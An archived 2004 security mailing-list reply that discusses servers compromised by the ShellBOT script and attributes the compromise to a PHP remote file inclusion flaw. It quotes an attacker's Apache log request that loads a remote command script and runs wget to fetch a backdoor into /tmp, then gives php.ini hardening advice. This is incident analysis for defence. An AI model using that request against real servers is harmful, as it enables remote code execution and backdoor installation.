Re: Systems compromised with ShellBOT perl script - part 2
From: Chris Norton (kicktd_list_at_hotmail.com)
Date: 10/21/04
- Previous message: David Gillett: "RE: DoS worm"
- In reply to: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Jim Halfpenny: "re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <incidents@securityfocus.com> Date: Thu, 21 Oct 2004 11:53:08 -0500
This sounds like it may be a typical fopen()/include() PHP exploit as this
seems to be the motive for this group,
As seen from the very first post:
> Kirby Angell wrote:
>
> Yesterday we noticed a funny looking Apache log entry. It contained:
>
>
>
http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
Where a remote php shell script file is used then the backdoor is uploaded
onto the server. This can be avoided by
setting the safe_mode setting in php.ini to on and disabled_functions: to
include exec, popen, and passthru.
-- Chris Norton UAT Student Software Engineering Network Defense
- Previous message: David Gillett: "RE: DoS worm"
- In reply to: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Jim Halfpenny: "re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
